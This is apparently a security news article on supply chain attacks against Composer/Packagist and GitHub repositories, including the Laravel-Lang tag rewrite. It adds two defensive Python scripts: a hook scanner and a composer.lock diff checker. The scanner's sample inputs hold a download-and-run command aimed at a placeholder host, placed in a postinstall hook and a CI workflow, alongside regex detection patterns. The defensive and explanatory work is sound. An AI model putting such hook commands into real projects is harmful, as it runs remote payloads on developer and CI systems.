Researchers identified multiple coordinated software supply chain attacks targeting Composer/Packagist packages and upstream GitHub repositories. The activity involved malicious postinstall hooks, compromised Git tags, CI/CD payload execution, and credential-stealing malware designed to exfiltrate secrets from developer systems and CI environments. The campaigns impacted Laravel-related packages as well as additional PHP and Node.js repositories, with malicious code delivered through package installation workflows, Composer autoload behavior, and GitHub Actions pipelines.
Researchers from Socket identified a large-scale campaign affecting more than 700 GitHub repositories and multiple Packagist packages. The attackers inserted malicious postinstall hooks into package.json files that downloaded a remote binary from attacker-controlled GitHub infrastructure, wrote it to /tmp/.sshd, marked it executable, and launched it in the background. Additional investigation revealed the same payload embedded inside GitHub Actions workflow files, indicating attempts to compromise CI/CD execution paths in addition to local developer environments. The campaign primarily targeted projects combining PHP and JavaScript tooling, exploiting the likelihood that defenders would inspect composer.json while overlooking bundled Node.js lifecycle hooks.
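The hook pattern described above (fetch a remote binary, drop it under a hidden `/tmp` path, mark it executable, launch it in the background) is the same whether it sits in a `package.json` lifecycle script or in a GitHub Actions `run:` step, so one set of indicators can cover both files. The scanner below is an added example written for this page, not tooling from Socket or from any affected project. The regex heuristics, the `example.invalid` URL and both sample documents are constructed for the demonstration.

```python
import json
import re

# Heuristics for "download, drop to a hidden temp path, mark executable,
# launch in the background". Constructed for this example; tune for your environment.
INDICATORS = [
    ("remote download", re.compile(r"\b(curl|wget)\b[^|;&]*https?://")),
    ("hidden temp path", re.compile(r"/tmp/\.[A-Za-z0-9_.-]+")),
    ("mark executable", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("background execution", re.compile(r"(?<!&)&\s*$|\bnohup\b|\bsetsid\b")),
]

# npm runs these automatically during `npm install`; none of them prompt the user.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")


def classify_command(cmd):
    """Return the names of all indicators that match a shell command string."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def scan_package_json(text):
    """Flag lifecycle scripts in a package.json document that match the indicators."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = classify_command(cmd)
        if hits:
            findings.append({"location": f"scripts.{hook}", "indicators": hits, "command": cmd})
    return findings


def scan_workflow(text):
    """Line-based scan of a GitHub Actions workflow; catches `run:` steps without a YAML parser."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = classify_command(line)
        if hits:
            findings.append({"location": f"line {lineno}", "indicators": hits, "command": line.strip()})
    return findings


# Constructed sample inputs (not taken from any real repository).
SAMPLE_PACKAGE_JSON = """{
  "name": "example-app",
  "scripts": {
    "build": "vite build",
    "postinstall": "curl -fsSL https://example.invalid/payload -o /tmp/.sshd && chmod +x /tmp/.sshd && /tmp/.sshd &"
  }
}"""

SAMPLE_WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: |
          curl -fsSL https://example.invalid/payload -o /tmp/.sshd
          chmod +x /tmp/.sshd
          /tmp/.sshd &
"""

if __name__ == "__main__":
    for f in scan_package_json(SAMPLE_PACKAGE_JSON) + scan_workflow(SAMPLE_WORKFLOW):
        print(f"{f['location']}: {', '.join(f['indicators'])}  <-  {f['command']}")
```

Run it over every `package.json` and every file under `.github/workflows/` in a repository, including those inside `vendor/` and `node_modules/`, since the hook in a bundled dependency executes with the same privileges as one in the top-level project. A single indicator (a `curl` in a `prepare` script, say) is common in legitimate projects; the combination of all four in one command is what should page someone.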
Separately, researchers from StepSecurity reported that an attacker with push access to the Laravel-Lang GitHub organization force-rewrote every Git tag across several highly popular Composer packages, including laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/actions, and laravel-lang/attributes. The malicious commits modified Composer autoload behavior by adding a src/helpers.php file to the autoload.files section, causing the payload to execute automatically whenever vendor/autoload.php was loaded. The malware fetched additional payloads from a typosquatted domain, exfiltrated CI secrets and environment variables, spawned orphaned processes to evade detection, and removed artifacts from disk within seconds to hinder forensic analysis.
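Two facts from the Laravel-Lang incident are visible in `composer.lock` without touching the network: a tag that has been force-rewritten resolves to a different commit while keeping the same version string, and a package that gained a `src/helpers.php` entry in `autoload.files` will show that entry in its lock record. The checker below diffs an old and a new `composer.lock` for exactly those two signals. It is an added example written for this page, not StepSecurity's or Composer's own code. The `1.0.0` / `2.x` version strings, the all-zero commit hashes and the `example.invalid` repository URLs are constructed placeholders, not real releases.

```python
import json


def index_packages(lock):
    """Map package name -> lock entry across both 'packages' and 'packages-dev'."""
    return {pkg["name"]: pkg
            for section in ("packages", "packages-dev")
            for pkg in lock.get(section, [])}


def pinned_reference(pkg):
    """Commit hash the lock pins for a package (source first, dist as fallback)."""
    for key in ("source", "dist"):
        ref = pkg.get(key, {}).get("reference")
        if ref:
            return ref
    return None


def autoload_files(pkg):
    """Files Composer requires on every load of vendor/autoload.php."""
    return set(pkg.get("autoload", {}).get("files", []))


def diff_locks(old_text, new_text):
    """Compare two composer.lock documents; return (package, finding, detail) tuples."""
    old = index_packages(json.loads(old_text))
    new = index_packages(json.loads(new_text))
    findings = []
    for name, new_pkg in new.items():
        old_pkg = old.get(name)
        if old_pkg is None:
            continue  # brand-new dependency: review it separately
        # Same version string but a different commit means the tag itself was moved.
        if (new_pkg.get("version") == old_pkg.get("version")
                and pinned_reference(new_pkg) != pinned_reference(old_pkg)):
            findings.append((name, "tag moved",
                             f"{pinned_reference(old_pkg)} -> {pinned_reference(new_pkg)}"))
        # Anything added to autoload.files runs unconditionally at autoload time.
        added = autoload_files(new_pkg) - autoload_files(old_pkg)
        if added:
            findings.append((name, "new autoload.files", sorted(added)))
    return findings


# Constructed sample data: placeholder hashes and versions, not real releases.
OLD_REF = "0000000000000000000000000000000000000001"
NEW_REF = "0000000000000000000000000000000000000002"


def _entry(name, version, ref, files=()):
    """Build a minimal composer.lock package entry (constructed helper for the sample)."""
    return {
        "name": name,
        "version": version,
        "source": {"type": "git", "url": f"https://example.invalid/{name}.git", "reference": ref},
        "autoload": {"psr-4": {"Example\\": "src/"}, "files": list(files)},
    }


OLD_LOCK = json.dumps({"packages": [
    _entry("laravel-lang/lang", "1.0.0", OLD_REF),
    _entry("example/benign-lib", "2.0.0", OLD_REF),
], "packages-dev": []})

# After `composer update`: laravel-lang/lang keeps its version but changes commit and
# gains an autoload file; example/benign-lib is an ordinary version bump.
NEW_LOCK = json.dumps({"packages": [
    _entry("laravel-lang/lang", "1.0.0", NEW_REF, files=["src/helpers.php"]),
    _entry("example/benign-lib", "2.1.0", NEW_REF),
], "packages-dev": []})

if __name__ == "__main__":
    for name, finding, detail in diff_locks(OLD_LOCK, NEW_LOCK):
        print(f"{name}: {finding}: {detail}")
```

The benign library changes commit too, but alongside a version bump, so it produces no finding; only the unchanged-version-with-new-commit pair is reported. Running this diff in CI against the committed lock file (for example as a step that fails the pipeline when `diff_locks` is non-empty) catches the rewritten tag before `vendor/autoload.php` is ever loaded, which is the point at which the helper file described above would otherwise execute.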